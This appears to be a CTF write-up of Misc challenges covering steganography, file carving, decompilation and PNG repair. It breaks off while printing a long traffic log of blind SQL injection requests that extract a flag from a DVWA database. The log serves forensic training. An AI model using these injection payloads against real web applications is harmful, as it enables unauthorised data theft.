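3rd SWCTF Misc: All Write-ups

Foreword

Many of these are tool-based challenges, and they are fairly broad and mixed; this post simply records the ideas behind the Misc challenges I set.

Copyright © [2024] [Myon⁶]. All rights reserved.

Challenge source files:

https://github.com/Myon5/Myon-Misc

Contents

1. Master Yong's Free-Points Challenge, Just Enjoy It Quietly

2. Ke Ke Ke Ah

3. The Clown's Gift

4. Boss Xiao Says It's Too Obvious

5. Bieber&Troye

6. Unmask The Joker

7. Master Yong's Wild Ideas (Hardened Edition 1)

8. Master Yong's Wild Ideas (Hardened Edition 2)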


1. Master Yong's Free-Points Challenge, Just Enjoy It Quietly

This one really is a free-points challenge.

There is a file hidden inside the attachment.

Separate it out and open flag.txt.

There is base64-encoded text at the end; decoding it is all that is needed.

The flag is: flag{swust_snert_swctf}

2. Ke Ke Ke Ah

The attachments are two wav audio files and one txt file.

Start with the txt: it is a very long base64 string.

Decode it, and a PNG header is plainly visible.

So convert the base64 to an image; an online site or a local tool both work.

Here we simply save the result with a .png extension.

Looking at the picture, it does not seem to be complete.

We brute-force the correct width and height against the CRC.

This gives the repaired image.
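The width and height brute force described above, as an added example (not the author's script or tool): it recomputes the IHDR CRC for candidate dimensions until one matches the CRC stored in the file, then writes the dimensions back. The sample PNG and all function names are constructed for illustration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def chunk(ctype, data):
    """Serialize one PNG chunk: length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data)
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(width, height):
    """Constructed sample: a valid 8-bit grayscale PNG filled with black."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    rows = b"".join(b"\x00" + bytes(width) for _ in range(height))
    return (PNG_SIG + chunk(b"IHDR", ihdr)
            + chunk(b"IDAT", zlib.compress(rows)) + chunk(b"IEND", b""))


def tamper(png, width=None, height=None):
    """Overwrite the IHDR dimensions and leave the stored CRC untouched."""
    out = bytearray(png)
    if width is not None:
        out[16:20] = struct.pack(">I", width)
    if height is not None:
        out[20:24] = struct.pack(">I", height)
    return bytes(out)


def recover_dimensions(png, max_dim=4096):
    """Return the (width, height) whose IHDR CRC equals the CRC in the file."""
    if png[:8] != PNG_SIG or png[12:16] != b"IHDR":
        raise ValueError("not a PNG with a leading IHDR chunk")
    width, height = struct.unpack(">II", png[16:24])
    rest = png[24:29]  # bit depth, colour type, compression, filter, interlace
    stored = struct.unpack(">I", png[29:33])[0]

    def crc(w, h):
        return zlib.crc32(b"IHDR" + struct.pack(">II", w, h) + rest)

    if crc(width, height) == stored:
        return width, height  # header is already consistent
    # Cheap cases first: only the height, then only the width, was altered.
    for h in range(1, max_dim + 1):
        if crc(width, h) == stored:
            return width, h
    for w in range(1, max_dim + 1):
        if crc(w, height) == stored:
            return w, height
    # Fallback: both fields altered. Reuse the CRC state of the width prefix.
    for w in range(1, max_dim + 1):
        prefix = zlib.crc32(b"IHDR" + struct.pack(">I", w))
        for h in range(1, max_dim + 1):
            if zlib.crc32(struct.pack(">I", h) + rest, prefix) == stored:
                return w, h
    raise ValueError("no dimensions up to max_dim match the stored CRC")


def repair(png, max_dim=4096):
    """Write the recovered dimensions back so the header matches its CRC."""
    width, height = recover_dimensions(png, max_dim)
    return tamper(png, width=width, height=height)


if __name__ == "__main__":
    broken = tamper(build_sample_png(37, 23), height=5)
    print(recover_dimensions(broken))
```
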

Open it to get the password: That's terrible.

We do not know what it is for yet; keep it, it will certainly be needed later.

Next, look at the two audio clips.

joker1 is a very short burst of noise, and joker2 is a song.

Tools commonly used for audio analysis in CTFs: RX-SSTV, DeepSound, Audacity

No radio-style signal can be heard here, so RX-SSTV is ruled out.

A few quick attempts show the following:

Open joker1.wav in Audacity.

The spectrogram view gives the first half of the flag: flag{1S_it_JUst_me_

Opening joker2.wav in DeepSound prompts for a password, which is exactly where the password we got from the image earlier comes in,

namely: That's terrible.

After entering the password, a hidden flag2.txt shows up.

Extract it.

Opening it gives the second part of the flag: 0R_is_iT_Getting_crAzier_0Utthere}

Joined together, the final flag is: flag{1S_it_JUst_me_0R_is_iT_Getting_crAzier_0Utthere}

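3. The Clown's Gift

The attachments are a pyc file, a jpg and a txt file.

A pyc file tells us nothing as it stands; normally a pyc has to be turned back into a py file, that is, decompiled.

An online site can do this:

https://tool.lu/pyc/

After decompiling, copy out the useful code.

uncompyle6 in PyCharm can do it as well (the module has to be installed).

Run the following command in the terminal.

dc.pyc is the source file and dc.py is the file produced by decompilation (a space is needed on each side of the greater-than sign):

uncompyle6.exe dc.pyc > dc.py

After it runs successfully you get dc.py.

Note: a py file decompiled this way may have format problems that stop it from running directly.

Copying the code into a newly created py file makes it run normally.

For details see my earlier post: SyntaxError: Non-UTF-8 code starting with '\xff' in file but no encoding declared (solution and analysis)

http://t.csdnimg.cn/PZiIc

It looks like a decryption script:

It splits a string on spaces into a list and uses each element to index a two-dimensional list of letters (the letters as laid out on a keyboard), then prints the string made of the matching letters.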

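# Ciphertext: space-separated codes, each a 1-based keyboard row followed by
# a 1-based column. It is empty in the decompiled file and is filled in later.
a = ''.split(' ')
# Letter rows of a QWERTY keyboard, top to bottom
key_list = [
    ['q', 'w', 'e', 'r', 't', 'y', 'u', 'i', 'o', 'p'],
    ['a', 's', 'd', 'f', 'g', 'h', 'j', 'k', 'l'],
    ['z', 'x', 'c', 'v', 'b', 'n', 'm'],
]
print(a)
for index in a:
    for i, key_lists in enumerate(key_list):
        for i2, key in enumerate(key_lists):
            # Row number and column number concatenated, e.g. '18' -> row 1, column 8
            if str(i + 1) + str(i2 + 1) == index:
                print(key, end='')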

But we do not have the ciphertext yet, so set this aside and look at the other attachments.

Open secret.txt: it is a very long-winded e-mail.

If you have met this while practising challenges you will recognise it: this is spam-mail encoding.

You can also search for the e-mail's content together with keywords such as CTF.

You will find a site: https://www.spammimic.com/

It decodes this kind of spam mail, so we simply decode it there.

This gives a string of space-separated numbers: 18 15 18 22 36 19 15 21 27 19 28 13

Run it through the decryption script from before.

Assign a the numbers just obtained: 18 15 18 22 36 19 15 21 27 19 28 13

Running it gives: itisnotajoke

It is probably a password; keep it for later.

The only attachment left now is joker.jpg.

A series of image-analysis commands turned up nothing.

Open it in 010 Editor and scroll to the end: it is the very common trick of hiding information after the end of the file.

The 50 4B archive header stands out, only it has been stored in reverse order.

Because the jpg part is highlighted, where it ends is also clear.

Extract the hex values directly.

It is too long to type out here: from 00 00 00 10 all the way to the final B4 05.

Running the reversal script above gives hex values that start with 50 4B.

Create a new hex file.

Import the reversed hex values; note that this needs Ctrl+Shift+V.

Since 50 4B is the archive header, save it as a zip file.
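The carve, reverse and save-as-zip steps above, as an added example (not the author's reversal script, which is not reproduced on this page): it walks the JPEG markers to find where the image really ends, reverses the hex digits of everything after that point (the operation that turns the trailing B4 05 into 50 4B) and checks that the result is a ZIP. The sample carrier is constructed, its archive is unencrypted unlike the challenge's, and all function names are illustrative.

```python
import io
import zipfile

# Inside scan data, FF 00 (byte stuffing) and FF D0..D7 (restart markers)
# do not end the scan.
STUFFED = {0x00} | set(range(0xD0, 0xD8))


def jpeg_end_offset(data):
    """Return the offset just past the EOI marker by walking JPEG segments."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:          # fill byte before a marker
            pos += 1
            continue
        if marker == 0xD9:          # EOI: the image ends here
            return pos + 2
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        if seg_len < 2:
            raise ValueError(f"bad segment length at offset {pos}")
        pos += 2 + seg_len
        if marker == 0xDA:          # SOS: skip the entropy-coded scan data
            while pos + 2 <= len(data) and not (
                    data[pos] == 0xFF and data[pos + 1] not in STUFFED):
                pos += 1
    raise ValueError("no EOI marker found")


def recover_reversed_zip(stego):
    """Carve the bytes after EOI and undo the digit-wise hex reversal."""
    tail = stego[jpeg_end_offset(stego):]
    candidate = bytes.fromhex(tail.hex()[::-1])
    if not candidate.startswith(b"PK\x03\x04"):
        raise ValueError("reversed tail is not a ZIP local file header")
    return candidate


def list_members(stego):
    """Parse the recovered bytes as a ZIP and return the member names."""
    with zipfile.ZipFile(io.BytesIO(recover_reversed_zip(stego))) as zf:
        return zf.namelist()


def build_sample():
    """Constructed sample: minimal JPEG marker structure plus a reversed ZIP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("pass.txt", "constructed sample content")
    plain_zip = buf.getvalue()
    hidden = bytes.fromhex(plain_zip.hex()[::-1])
    carrier = (b"\xff\xd8"                          # SOI
               + b"\xff\xe0\x00\x04AB"              # APP0 with 2 payload bytes
               + b"\xff\xda\x00\x03\x01"            # SOS header
               + b"\x12\xff\x00\x34\xff\xd0\x56"    # scan data with FF 00 and RST0
               + b"\xff\xd9")                       # EOI
    return carrier + hidden, plain_zip


if __name__ == "__main__":
    sample, _ = build_sample()
    print(jpeg_end_offset(sample), list_members(sample))
```

Walking the segments stops at the first real EOI, so an FF D9 byte pair that happens to occur inside the appended data does not move the carve point.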

Opening it shows that a password is required.

Extract it with the password obtained earlier: itisnotajoke

This gives another joker picture and a pass.txt document.

Inspection shows that pass.txt contains zero-width steganography.

The resulting pass is: "if we could be whoever we want, would the cloud love us like they hug the stars?"

It is probably one very long password.

With a password and a jpg picture in hand, LSB steganography in the jpg comes to mind

(LSB steganography in a png usually needs no password).

There is indeed hidden data.

Here we assume it extracts as a txt file (and change that if it turns out not to be).

Open it to see the flag:

flag{Are_y0u_hav1ng_aNy_nEgative_thoUghts}

4. Boss Xiao Says It's Too Obvious

Filter for http packets, and it becomes clear that this is traffic from a blind SQL injection.

Searching for the keyword flag finds many request records involving flag.

Pick any one and URL-decode it to see the full query.

Here the flag is being read from the snert table in the swctf database by blind injection.

Each character is compared against an ASCII code, and whether the response status code is 200 or 404 determines which characters the flag consists of.

Extract the URLs of the relevant requests; only the Info column is needed here, so leave the others unchecked.

Search for flag to locate where the flag queries begin.

Copy all the data from this packet through to the end.

URL-decode the whole thing.
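One way to replay the comparison oracle from the decoded export, as an added example (not the author's script): for every character position it keeps the highest threshold that answered 200 and the lowest that answered 404, and accepts the character only when the two bounds are adjacent. The sample log is rebuilt from the first five positions of the capture in this write-up; the function names and the export layout (one request line followed by one status line) are assumptions.

```python
import re
from collections import defaultdict

# Matches "...),<position>,1))><threshold>" in a URL-decoded request line.
REQ = re.compile(r"ORD\(MID\(\(.*\),(\d+),1\)\)>(\d+)")
STATUS = re.compile(r"^HTTP/1\.[01] (\d{3})")

REQUEST_TEMPLATE = (
    "GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT "
    "IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id "
    "LIMIT 0,1),{pos},1))>{thr} AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1"
)

# (threshold, status) pairs for positions 1-5, as they appear in the capture.
SAMPLE = {
    1: [(64, 200), (96, 200), (112, 404), (104, 404), (100, 200), (102, 404), (101, 200)],
    2: [(96, 200), (112, 404), (104, 200), (108, 404), (106, 200), (107, 200)],
    3: [(96, 200), (112, 404), (104, 404), (100, 404), (98, 404), (97, 404)],
    4: [(96, 200), (112, 404), (104, 404), (100, 200), (102, 200), (103, 404)],
    5: [(96, 200), (112, 200), (120, 200), (124, 404), (122, 200), (123, 404)],
}


def build_sample_log():
    """Rebuild the request/status line pairs in the layout of the saved txt."""
    lines = []
    for pos, probes in SAMPLE.items():
        for thr, status in probes:
            reason = "OK" if status == 200 else "Not Found"
            lines.append(REQUEST_TEMPLATE.format(pos=pos, thr=thr))
            lines.append(f"HTTP/1.1 {status} {reason}  (text/html)")
    return "\n".join(lines)


def parse_observations(log_text):
    """Yield (position, threshold, answered_true) per request/response pair."""
    pending = None
    for line in log_text.splitlines():
        line = line.strip()
        req = REQ.search(line)
        if line.startswith("GET ") and req:
            pending = (int(req.group(1)), int(req.group(2)))
            continue
        status = STATUS.match(line)
        if status and pending:
            yield pending[0], pending[1], status.group(1) == "200"
            pending = None


def recover(log_text):
    """Rebuild the extracted string; '?' marks a position the log leaves open."""
    low = defaultdict(int)             # 200 for "> thr": char code > low
    high = defaultdict(lambda: 256)    # 404 for "> thr": char code <= high
    for pos, thr, answered_true in parse_observations(log_text):
        if answered_true:
            low[pos] = max(low[pos], thr)
        else:
            high[pos] = min(high[pos], thr)
    chars = []
    for pos in sorted(set(low) | set(high)):
        resolved = high[pos] == low[pos] + 1
        chars.append(chr(high[pos]) if resolved else "?")
    return "".join(chars)


if __name__ == "__main__":
    print(recover(build_sample_log()))
```
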

Save the decoded content as a txt file:

GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),1,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>106 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),2,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),3,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),4,1))>103 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>124 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>122 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),5,1))>123 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),6,1))>103 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>66 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>63 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),7,1))>65 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),8,1))>99 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),9,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
